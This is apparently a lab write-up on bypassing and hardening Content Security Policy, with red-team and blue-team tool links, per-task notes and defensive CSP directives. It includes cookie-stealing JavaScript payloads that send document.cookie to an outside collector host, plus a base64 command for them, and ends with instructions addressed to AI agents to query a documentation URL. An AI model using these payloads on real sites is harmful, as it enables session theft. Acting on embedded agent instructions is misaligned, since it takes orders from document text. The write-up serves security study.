# Content Security Policy Writeup
## **Blue Team**
[Evaluator](https://csp-evaluator.withgoogle.com/)
[Hasher](https://report-uri.com/home/hash)
[Generator](https://report-uri.com/home/generate)
## **Red Team**
[JSONP Bypass](https://github.com/A1vinSmith/JSONBee/blob/master/jsonp.txt)
[Exfiltrator](https://beeceptor.com/)
## Payload
```javascript
fetch(`https://randomcsp.free.beeceptor.com/${document.cookie}`)
eval(document.location='https://randomcsp.free.beeceptor.com/'.concat(document.cookie))
```
## Attack
### **task 1**
```javascript
```
### **task 2 (script-src data:)**
```javascript
```
The alternative way is using `data:;base64,iVBORw0KGgo...`
```bash
echo -n 'fetch(`https://randomcsp.free.beeceptor.com/${document.cookie}`)' | base64
```
### **task 3 (img-src \*; script-src 'unsafe-inline')**
```javascript
```
### **task 4 (style-src \* 'self'; script-src 'nonce-abcdef')**
```javascript
```
### **task 5 (JSONP endpoints, script-src 'unsafe-eval' \*.google.com)**
```javascript
```
### **task 6 (Trust CDN? script-src 'unsafe-eval' cdnjs.cloudflare.com)**
CDN is way too generous. They're not only providing dependence for your website also for the hackers. When setting up the script-src directive and its sources, you should pay special attention to what you're allowing to load. If you're loading a script from an external source such as a CDN, make sure you're specifying the full URL of the script or a nonce/SHA hash of it and not just the hostname where it's hosted at, unless you're 100% sure no scripts that could be used to bypass your policy are hosted there. For example, if you're including jQuery from cdnjs on your website, you should include the full URL of the script `script-src cdnjs.cloudflare.com/ajax/.../jquery.min.js` or the SHA256 hash in your policy. Most CDNs allow you to get the script hash somewhere on their site.
```javascript
```
### **task 7**
After checking [Evaluator](https://csp-evaluator.withgoogle.com/)
```bash
default-src 'none';
media-src *;
style-src 'self';
script-src 'self'
```
'self' can be problematic if you host JSONP, Angular or user-uploaded files.
`media-src` specifies the URLs from which video, audio and text track resources can be loaded from. Checking [MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/media-src)
This one is the hardest and the best.
1\. The 404 pages will show up whatever you put in. means this one match `can be problematic if you host JSONP, Angular or user uploaded files.`
2\. Need to understand how `script-src 'self';` works. It means something like `ip:3008/defend-1.js` will be executed.
3\. Then try to close the tag with `'`. `` alert should just work.
4\. What to do after the `fetch`, `window.open` and `document.location` is blocked by CSP? The answer is `media-src` `new Audio`
5\. Use relative path for the 404 pages, also a browser won't block your input for `Phishing`
```javascript
```
## Defend
### **task 1**
`script-src 'self';`
### **task 2**
`script-src 'nonce-ae3b00';`
### **task 3 (Inline JS)**
[Hasher](https://report-uri.com/home/hash) to generate the hash for that inline javascript. `script-src 'sha256-8gQ3l0jVGr5ZXaOeym+1jciekP8wsfNgpZImdHthDRo='`
## Expand Knowledge
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://alvinsmith.gitbook.io/progressive-oscp/untitled/content-security-policy-writeup.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.